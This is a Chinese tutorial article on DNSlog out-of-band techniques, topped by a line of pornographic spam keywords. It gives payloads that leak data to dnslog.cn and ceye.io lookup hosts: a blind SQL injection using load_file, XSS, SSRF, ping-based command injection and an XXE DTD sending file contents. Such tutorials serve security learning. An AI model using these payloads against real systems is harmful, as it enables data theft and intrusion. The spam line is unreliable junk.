亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

深入理解DNSlog

 更新時間:2023年05月19日 14:45:26   作者:告白熱  
本文主要介紹了深入理解DNSlog,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

0x00 DNSlog 介紹

首先我們知道DNS是起ip與域名的解析的服務,通過ip可以解析到對應的域名。DNSlog就是儲存在DNS上的域名相關的信息,它記錄著你對域名或者IP的訪問信息,也就是類似于日志文件,

0x01 DNSlog回顯原理

首先了解一下多級域名的概念,我們知道因特網采用樹狀結構命名方法,按組織結構劃分域是一個名字空間中一個被管理的劃分,域可劃分為子域,子域再可被劃分為多級域名稱為一級域名,二級域名,三級域名,從一個域名地址來從右到左依次是頂級域名,二級域名,三級域名,例如 gaobai.kxsy.com,
通俗的說就是我有個域名kxsy.work,我將域名設置對應的ip 2.2.2.2 上,這樣當我向dns服務器發(fā)起kxsy.work的解析請求時,DNSlog中會記錄下他給kxsy.work解析,解析值為2.2.2.2,而我們這個解析的記錄的值就是我們要利用的地方,這個過程被記錄下來就是DNSlog,

0x02 DNSlog 應用

1.sql布爾盲注、時間盲注,注入的效率低且線程高容易被waf攔截,又或者是目標站點沒有回顯可利用NDSlog
2.無回顯的命令執(zhí)行
推薦三個大眾化的免費dns解析記錄網站

http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

0x03 DNSlog回顯注入條件

1.數據庫root權限,
2.數據庫可讀寫權限,secure_file_priv值為空,上期筆記有說明,
3.windows系統(tǒng),

0x04 DNSlog -sql注入

1.注冊一個dns解析服務,利用唯一標識符,以無回顯sql注入為例

利用標識符

2.注入測試 需要閉合語句 替換標識符 利用盲注回顯

?id=1' and if((select load_file(concat('\\\\',(select database()),'.tlyypi.dnslog.cn\\abc'))),1,0)--+

記錄到靶場數據庫信息

在回顯數據時,域名能夠接受的字符是有條件限制的,某些不適合作為域名的特殊字符可能會被屏蔽掉,針對這種情況我們也可以base64編碼后再進行請求。

0x05 DNSlog 其他應用

1.xss盲打

"<script src=http://XSS.XXXXX.ceye.io></script>"

2.SSRF

"... <!ENTITY test SYSTEM "SSRF.xxxx.ceye.io\\aa"> ..."

3.命令執(zhí)行

" ping %PATH%.pxxx.ceye.io ..."

4.XXE

XXE漏洞可以解析外部實體,就可以拿來讀取本地服務器文件,這時,我們只需把dtd文件改成這樣

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://XXXX.ceye.io/%file;'>"
>
%all;

到此這篇關于深入理解DNSlog 的文章就介紹到這了,更多相關DNSlog內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

  • DNS服務器未響應的原因及解決方法

    DNS服務器未響應的原因及解決方法

    DNS是進行域名和與之相對應的IP地址轉換的服務器,本文主要介紹了DNS服務器未響應的原因及解決方法,具有一定的參考價值,感興趣的可以了解一下
    2023-10-10
  • DNS信息查詢工具dig用法詳解

    DNS信息查詢工具dig用法詳解

    這篇文章主要為大家介紹了DNS信息查詢工具dig用法詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪
    2023-08-08
  • RHE5服務器管理 搭建DNS服務器步驟說明[圖文]

    RHE5服務器管理 搭建DNS服務器步驟說明[圖文]

    本文介紹 RHE5中搭建DNS服務器的方法,供大家學習參考
    2013-03-03
  • Windows?Server?2019?安裝架設DNS服務器

    Windows?Server?2019?安裝架設DNS服務器

    這篇文章主要介紹了Windows?Server?2019?DNS服務器的配置與管理之安裝DNS服務,需要的朋友可以參考下
    2023-05-05
  • 深入理解DNSlog

    深入理解DNSlog

    本文主要介紹了深入理解DNSlog,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2023-05-05
  • win2003 DNS服務器配置方法[圖文詳解]

    win2003 DNS服務器配置方法[圖文詳解]

    目前很多企業(yè)事業(yè)單位都建立了單位內部的局域網,網絡內部都配備相關的服務器(如web、ftp等服務器)。內部網絡的用戶都希望所有的服務器都用域名來訪問,網絡管理員可以采用在內部搭建DNS服務器的方式來實現(xiàn)
    2012-10-10
  • Windows?Server?2019?DNS服務器的配置與管理之DNS反向解析

    Windows?Server?2019?DNS服務器的配置與管理之DNS反向解析

    這篇文章主要介紹了Windows?Server?2019?DNS服務器的配置與管理之DNS反向解析,需要的朋友可以參考下
    2023-05-05
  • DNS服務器中創(chuàng)建正向查找區(qū)域并在該區(qū)域下創(chuàng)建主機記錄

    DNS服務器中創(chuàng)建正向查找區(qū)域并在該區(qū)域下創(chuàng)建主機記錄

    創(chuàng)建正向查找區(qū)域ynkm.com,并在該區(qū)域下創(chuàng)建主機記錄Webserver,ynkm.com,具體操作步驟如下,需要的朋友可以了解下
    2013-12-12
  • 非常好用的DNS服務器(推薦)

    非常好用的DNS服務器(推薦)

    本文主要介紹了非常好用的DNS服務器,這些 DNS 服務器都可以免費使用,不同地區(qū)的 DNS 解析速度可能會有所不同,建議選擇距離自己較近的 DNS 服務器以獲得更好的解析速度,下面就一起來了解一下
    2023-10-10
  • DNS原理及其解析過程剖析(圖文)

    DNS原理及其解析過程剖析(圖文)

    我們無法記住10個以上IP地址的網站,所以我們訪問網站時,更多的是在瀏覽器地址欄中輸入域名,就能看到所需要的頁面,這是因為有一個叫DNS服務器的計算機自動把我們的域名翻譯成了相應的IP地址,然后調出IP地址所對應的網頁
    2012-09-09

最新評論